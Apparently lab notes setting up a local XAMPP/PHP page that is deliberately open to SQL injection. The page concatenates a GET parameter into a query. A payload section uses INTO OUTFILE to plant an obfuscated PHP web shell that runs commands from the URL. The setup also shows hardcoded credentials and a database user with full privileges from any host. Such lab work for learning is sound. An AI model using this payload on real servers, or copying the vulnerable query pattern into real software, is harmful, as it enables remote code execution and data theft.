sql injection
===
## setting
- install Firefox
- Run `.\mysqladmin --user=root --password= password` in `/xampp/mysql/bin`
- set `/xampp/phpmyadmin/config.inc.php`
```php=
/* Authentication type and info */
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '1qaz@WSX';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['AllowNoPassword'] = false;
$cfg['Lang'] = '';
```
- set `httpd-xampp.conf`
```
Alias /phpmyadmin "C:/Users/sean/Desktop/xampp/phpMyAdmin/"
<Directory "C:/Users/sean/Desktop/xampp/phpMyAdmin">
Options Indexes FollowSymLinks MultiViews
AllowOverride all
Order Deny,Allow
Allow from all
Require all granted
</Directory>
```
- create a sql user just localhost
```sql=
CREATE USER 'phpmyadmin'@'localhost' IDENTIFIED BY 'donthackeme';
GRANT ALL PRIVILEGES ON *.* TO 'phpmyadmin'@'localhost' WITH GRANT OPTION;
FLUSH PRIVILEGES;
```
- create a sql user for any one client it
```sql=
CREATE USER 'phpmyadmin'@'%' IDENTIFIED BY 'donthackme';
GRANT ALL PRIVILEGES ON *.* TO 'phpmyadmin'@'%' WITH GRANT OPTION;
FLUSH PRIVILEGES;
```
## source
```php=
<html>
<head>
<style>
#customers {
font-family: Arial, Helvetica, sans-serif;
border-collapse: collapse;
width: 100%;
}
#customers td, #customers th {
border: 1px solid #ddd;
padding: 8px;
}
#customers tr:nth-child(even){background-color: #f2f2f2;}
#customers tr:hover {background-color: #ddd;}
#customers th {
padding-top: 12px;
padding-bottom: 12px;
text-align: left;
background-color: #4CAF50;
color: white;
}
</style>
</head>
<?php
$connection = new PDO('mysql:host=localhost;dbname=test;charset=utf8', 'root', '1qaz@WSX');
$id=$_GET['id'];
if(!$id) $id=1;
$statement = $connection->query('select * from blue where id='.$id);
?>
<table id='customers'>
<tr>
<td>id</td>
<td>tank</td>
<td>aircraft_carrier</td>
<td>fighter</td>
</tr>
<?php
foreach($statement as $row){
echo "<tr><td>".$row["id"]."</td>";
echo "<td>".$row["tank"]."</td>";
echo "<td>".$row["aircraft_carrier"]."</td>";
echo "<td>".$row["fighter"]."</td></tr>";
}
?>
</table>
<br><br>
<table id='customers'>
<tr>
<td>id</td>
<td>tank</td>
<td>aircraft_carrier</td>
<td>fighter</td>
</tr>
<?php
$statement = $connection->query('select * from blue');
foreach($statement as $row){
echo "<tr><td>".$row["id"]."</td>";
echo "<td>".$row["tank"]."</td>";
echo "<td>".$row["aircraft_carrier"]."</td>";
echo "<td>".$row["fighter"]."</td></tr>";
}
?>
</table>
</html>
```
## create table
```sql=
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
START TRANSACTION;
SET time_zone = "+00:00";
CREATE TABLE `blue` (
`id` int(11) NOT NULL,
`tank` int(11) DEFAULT NULL,
`aircraft_carrier` int(11) DEFAULT NULL,
`fighter` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `blue` (`id`, `tank`, `aircraft_carrier`, `fighter`) VALUES
(1, 100, 200, 300),
(2, 400, 700, 200),
(3, 100, 200, 900),
(4, 400, 500, 200),
(5, 100, 600, 200),
(6, 800, 400, 200),
(7, 200, 200, 700);
ALTER TABLE `blue`
ADD PRIMARY KEY (`id`);
ALTER TABLE `blue`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=8;
COMMIT;
```
## payload
```
127.0.0.1/sql.php?id=1;select 1, '<?php $y = "em";$a = "st";$g = "sy";$f = $g.$a.$y;$f($_GET["cmd"]); ?>' into outfile 'C:\\Users\\sean\\Desktop\\xampp\\htdocs\\cc.php'
```
- 純攻擊的話 要有路徑洩漏。
- you can look up xampp config from the shell.
## refer
- https://pjchender.blogspot.com/2015/08/php-data-objects-pdo.html
- https://www.bos.tw/2016/09/phpmyadmin%E7%99%BB%E5%85%A5mysql%EF%BC%8C%E9%8C%AF%E8%AA%A4%E8%A8%8A%E6%81%AF%E7%82%BA-error-1130-host-xxxx-is-not-allowed-to-connect-to-this-mysql-server/
- https://askubuntu.com/questions/763336/cannot-enter-phpmyadmin-as-root-mysql-5-7
- https://stackoverflow.com/questions/17816732/xampp-access-forbidden-php
- https://stackoverflow.com/questions/38522864/set-login-enable-for-phpmyadmin
Sign in with Wallet
Connect another wallet